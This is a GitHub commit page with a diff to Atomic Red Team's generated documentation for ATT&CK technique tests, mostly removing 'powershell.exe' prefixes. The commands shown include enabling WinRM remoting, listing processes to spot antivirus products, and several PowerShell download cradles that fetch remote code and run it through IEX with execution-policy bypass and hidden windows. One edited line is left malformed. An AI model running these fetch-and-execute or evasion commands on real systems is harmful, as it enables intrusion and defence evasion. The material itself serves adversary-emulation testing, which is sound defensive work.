Generate docs from job=validate_atomics_generate_docs branch=PowerShe…

…ll-Executor.Command-Properties
xiaoyanguoke · Sep 5, 2018 · c03d202 · c03d202
1 parent b512869
commit c03d202
Show file tree

Hide file tree

Showing 6 changed files with 10 additions and 10 deletions.
diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md
@@ -37,7 +37,7 @@ Powershell Enable WinRM
 
 #### Run it with `powershell`!
 ```
-powershell Enable-PSRemoting -Force
+Enable-PSRemoting -Force
 ```
 <br/>
 <br/>

diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md
@@ -40,7 +40,7 @@ Identify System owner or users on an endpoint
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| computer_name | Name of remote computer | strong | computer1|
+| computer_name | Name of remote computer | string | computer1|
 
 #### Run it with `command_prompt`!
 ```

diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md
@@ -57,10 +57,10 @@ Methods to identify Security Software on an endpoint
 
 #### Run it with `powershell`!
 ```
-powershell.exe get-process | ?{$_.Description -like "*virus*"}
-powershell.exe get-process | ?{$_.Description -like "*carbonblack*"}
-powershell.exe get-process | ?{$_.Description -like "*defender*"}
-powershell.exe get-process | ?{$_.Description -like "*cylance*"}
+get-process | ?{$_.Description -like "*virus*"}
+get-process | ?{$_.Description -like "*carbonblack*"}
+get-process | ?{$_.Description -like "*defender*"}
+get-process | ?{$_.Description -like "*cylance*"}
 ```
 <br/>
 <br/>

diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
@@ -27,6 +27,6 @@ Utilize powershell to download discovery.bat and save to a local file
 
 #### Run it with `powershell`!
 ```
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
+"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
 ```
 <br/>
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
@@ -167,7 +167,7 @@ Not proxy aware removing cache although does not appear to write to those locati
 
 #### Run it with `powershell`!
 ```
-powershell.exe -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
+IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
 ```
 <br/>
 <br/>
@@ -184,7 +184,7 @@ Powershell xml download request
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
 
-#### Run it with `powershell`!
+#### Run it with `command_prompt`!
 ```
 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
 ```

diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md
@@ -48,6 +48,6 @@ Identify the system time via PowerShell
 
 #### Run it with `powershell`!
 ```
-powershell.exe Get-Date
+Get-Date
 ```
 <br/>
-Original file line number
+Diff line change
@@ Expand Up / @@ -37,7 +37,7 @@ Powershell Enable WinRM @@
     #### Run it with `powershell`!
     ```
-    powershell Enable-PSRemoting -Force
+    Enable-PSRemoting -Force
     ```
     <br/>
     <br/>
@@ Expand Down @@